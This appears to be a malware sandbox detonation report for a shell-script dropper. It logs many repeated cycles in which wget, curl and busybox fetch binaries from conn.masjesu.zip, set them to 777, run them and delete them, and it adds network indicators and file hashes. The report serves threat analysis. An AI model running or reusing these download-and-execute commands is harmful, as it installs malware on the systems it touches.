[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg

[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/rm

[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/chmod

[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2

[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/rm

[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/chmod

[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5

[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/rm

[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/chmod

[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb

[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/rm

[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/chmod

[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8

[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/rm

[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/chmod

[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q

[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/rm

[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/chmod

[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL

[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/rm

[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/chmod

[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz

[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/rm

[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/chmod

[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8

[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/rm

[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/chmod

[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q

[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/rm

[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/chmod

[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh

[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/rm

[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/chmod

[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ

[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/rm

[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/chmod

[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3

[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/rm

[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/chmod

[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza

[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/rm

[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/chmod

[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz

[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/rm

[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/chmod

[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8

[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/rm

[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/chmod

[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q

[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/rm

[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/chmod

[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh

[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/rm

[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/chmod

[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ

[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/rm

[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/chmod

[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3

[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/rm

[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/chmod

[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza

[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/rm

[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/chmod

[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg

[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/rm

[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/chmod

[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2

[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/rm

[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/chmod

[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5

[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/rm

[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/chmod

[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb

[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/rm

[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/chmod

[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8

[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/rm

[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/chmod

[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q

[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/rm

[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/chmod

[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL

[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/rm

[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:58

Reported

2024-10-21 02:01

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

